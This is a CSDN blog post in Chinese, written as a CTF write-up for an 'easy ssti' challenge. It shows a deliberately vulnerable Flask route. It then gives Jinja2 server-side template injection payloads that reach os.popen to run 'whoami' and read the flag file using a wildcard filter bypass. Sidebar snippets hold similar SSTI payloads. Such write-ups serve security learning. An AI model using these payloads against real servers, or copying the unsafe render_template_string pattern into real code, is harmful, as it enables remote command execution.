easy ssti [愚人杯]

最新推荐文章于 2024-07-06 15:14:00 发布
最新推荐文章于 2024-07-06 15:14:00 发布
阅读量119 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63699746/article/details/133469981
版权

打开题目,下载app.zip

打开app.py

from flask import Flask
from flask import render_template_string,render_template
app = Flask(__name__)
​
@app.route('/hello/')
def hello(name=None):
    return render_template('hello.html',name=name)
@app.route('/hello/<name>')
def hellodear(name):
    if "ge" in name:
        return render_template_string('hello %s' % name)
    elif "f" not in name:
        return render_template_string('hello %s' % name)
    else:
        return 'Nonononon'

发现要执行模板函数,要么<name>中有ge,要么<name>中没有f

ge:关于ge的方法我没有去做,也是没想到

f:首先查看下基类下的所有子类

<name>="".__class__.__bases__[0].__subclasses__()

拉到文本中查看,再配合脚本找到os._wrap_close的popen函数进行利用,找到在132

{{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('whoami').read()}}

cd ..;ls一下,发现flag

由于过滤了f,那么直接匹配符进行绕过,payload:

{{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cd ..;cat *lag').read()}}

一个想一直摆烂的小白
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界easy_web之SSTI注入
m0_66935689的博客
07-29 222
昨天不是放假了嘛想着做几道题的刚好碰到个文件上传的条件竞争整半天头都整大了,网上搜了一下文章质量都参差不齐像我这种菜狗根本看不懂没办法花了两个金币看官方的writeup但还没研究明白就想着做一下其它题把那两个金币挣回来就刚好碰到这玩意。str = '''{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}''' # 原字符串。随便试了一下确定了这玩意会把我们输入的参数当作html解析。
ctfshow-2023愚人杯部分wp
adorkablezhenbai的博客
04-02 2289
新手web参加愚人
BUUCTF刷题十一道(12)SSTI专题一
qq_45837896的博客
04-09 704
SSTI填坑
CTFSHOW 愚人easy_ssti
SanKobe的博客
05-25 304
另外这道题刚开始的源码那块对"f"和"ge"进行了处理,我不知道在其他思路里会不会卡住,我试了下可以在语句的最后直接加上"ge"绕过。在页面上查catch_warning的位置,再查class的位置就能大概查到是第几个类了。是flask的模板,分析一下源码应该就是在/hello目录下有SSTI注入的漏洞。用ls查了一下当前目录,app.py 里也没啥有用信息,和压缩包里是一样的。进入hello目录下并照常走一下判断流程,发现应该是jinja2的模板。猜测了一下,应该是将语句中的"/"当成目录了。
UNCTF2022wp
weixin_52780973的博客
11-21 1017
unctf2022wp web、密码学Crypto、Misc、Reverse 比赛
UNCTF2022-Web
v2ish1yan的博客
11-21 858
unctf2022的所有webwp
fenjing工具,ssti
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
SSTI
03-09
**SSTI(Server-Side Template Injection)**是一种严重的网络安全漏洞,主要出现在使用服务器端模板引擎的Web应用程序中。这种漏洞允许攻击者注入恶意代码到服务器端模板,从而执行任意服务器端代码,获取敏感信息...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
flaskssti:测试SSTI
02-21
标题中的“flaskssti”指的是一个与Python web框架Flask相关的项目,可能是一个扩展或教程,专注于“SSTI”(Server-Side Template Injection,服务器端模板注入)。SSTI是一种安全漏洞,允许攻击者通过操纵模板引擎...
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。...
Dest0g3 520迎新赛 WEB EasySSTI
qq_41696858的博客
06-06 483
SSTI
有关于服务端模板注入(ssti攻击)——BUUCTF - easy_tornado
ancan8807的博客
09-07 1095
打开题目出现3个链接 /flag.txt 中提示flag in /fllllllllllllag /welcome.txt 中提示 render /hints.txt 中提示 md5(cookie_secret+md5(filename)) 直接访问/fllllllllllllag失败。 百度了render可知,render是python的一个模板,他们的url都是...
[护网杯 2018]easy_tornado(SSTI服务器端模板注入)
weixin_45253573的博客
11-12 647
tornado Tornado是一种 Web 服务器软件的开源版本。Tornado 和主流Web 服务器框架(包括大多数 Python 的框架)有着明显的区别:它是非阻塞式服务器,而且速度相当快。 可以考虑服务器端模板注入 参考SSTI完全学习 SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行,SSTI利用的是现在的网站模板引擎,主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornado django,php的smarty
网络安全测评技术与标准
最新发布
weixin_48579910的博客
07-06 630
网络安全测评通过多种方法和工具对系统、网络和应用程序进行全面评估,以发现和修复潜在的安全漏洞,确保其符合安全标准和政策。结合渗透测试、漏洞扫描、安全审计、风险评估、合规性测试、代码审查、社会工程测试、配置评估和基准测试等多种类型的测评,组织可以全面提升其网络安全防护能力,保护其信息资产和业务连续性。网络安全测评流程包括准备阶段、信息收集阶段、漏洞扫描阶段、渗透测试阶段、安全审计阶段、风险评估阶段、报告阶段、修复和验证阶段以及持续监控和改进阶段。
有2000元的不死高防吗
m0_70754056的博客
07-04 181
在网上搜索高防服务时,我们经常看到有死扛ddos攻击,无视cc攻击 打不死的服务器等字眼,我们必须保持清醒的头脑,因为市场上充斥着各种以低价诱人却暗藏陷阱的所谓“高防产品”。让我们擦亮眼睛,拒绝低价诱惑,为我们的网络世界构建真正坚实可靠的防护堡垒。记住,没有 2000 块的不死高防产品,只有踏实的投入和专业的服务才能保障我们的网络安全。真正有效的高防服务,需要强大的技术支持、硬件设施以及持续的维护和更新。结果在遭受严重的 DDoS 攻击时,所谓的高防形同虚设,导致业务中断,客户流失,造成了无法挽回的损失。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 868
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
为什么需要做网络安全服务?
weixin_45840241的博客
07-02 367
网络安全服务之所以重要,是因为它在保护数字资产、维护企业运营、确保法规遵从、防范恶意行为以及建立信任等方面扮演着关键角色。综上所述,网络安全服务对于保护企业的无形和有形资产、确保业务连续性和法律遵从性、以及维持客户和员工的信任都是至关重要的。
网络安全概述
m0_64365018的博客
07-06 677
中国安全市场规模一直呈上升趋势,体量越来越大,增长率几乎未减少,市场容量几乎翻了一倍,互联网是一个开放式的环境人员众多其伴随的环境肯定也会更加复杂多变从而导致攻击频发,例如常见的勒索病毒、数据泄露、黑客入侵等网络安全事件层出不穷,接下来我将每种类型分别讲解。
flask ssti
09-26
Flask SSTI(Server-Side Template Injection)是指在Flask应用中,由于未正确处理用户输入,导致用户输入的模板言被当作代码执行的漏洞。攻击者可以通过向模板注入恶意代码来执行任意命令或获取敏感信息。要防止SSTI漏洞,开发者需要注意对用户输入进行适当的过滤和转义。 在上面提供的代码中,虽然简单,但存在SSTI漏洞的潜在风险。因为在模板中,我们可以看到没有对用户输入进行任何处理,直接将其作为字符串插入到返回的HTML中。这就为攻击者注入恶意代码提供了机会。 为了防止SSTI漏洞,我们应该使用Flask提供的安全特性,如使用Jinja2模板引擎的自动转义功能。通过将用户输入标记为安全,Jinja2会自动过滤掉其中的危险代码,从而防止SSTI攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值